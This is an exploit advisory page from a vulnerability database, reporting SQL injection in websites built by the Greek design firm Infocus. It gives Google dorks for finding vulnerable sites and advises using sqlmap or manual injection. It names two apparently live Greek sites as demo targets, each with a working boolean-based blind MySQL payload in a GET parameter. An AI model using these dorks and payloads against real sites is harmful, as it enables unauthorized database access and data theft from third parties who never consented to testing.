Grecee İnfocus Sql İnjection Vulnerability

2018.04.29
tr TrazeR (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: Grecee İnfocus Sql İnjection Vulnerability # Author : TrazeR & AKINCİLAR # Google Dork : intext:"Design by infocus." inurl:searchStr site:gr OR => intext:"Design by infocus." inurl:catId site:gr # Tested on : Kali Linux 2018.1 # Date : 29.04.2018 # Vendor Home: http://www.infocus.gr/ # Blog : http://www.trazer.org/ # Forum : http://www.cyber-warrior.org/ ################################################################################# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] root@TrazeR:~# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Sqlmap Or Manuel [+] GET parameter 'searchStr' is vulnerable [+] GET parameter 'act' is vulnerable Demo: http://www.e-pili.gr/index.php?searchStr=&act=viewCat Parameter: searchStr (GET) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: searchStr=-8957) OR MAKE_SET(4369=4369,3525)-- mpjl&act=viewCat Demo 2 : http://www.lagomandranakis.gr/index.php?act=viewCat&catId=7 Parameter: act (GET) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: act=-4107) OR MAKE_SET(8921=8921,2739)-- Avuf&catId=7 [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://www.cyber-warrior.org/
http://www.trazer.org/


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top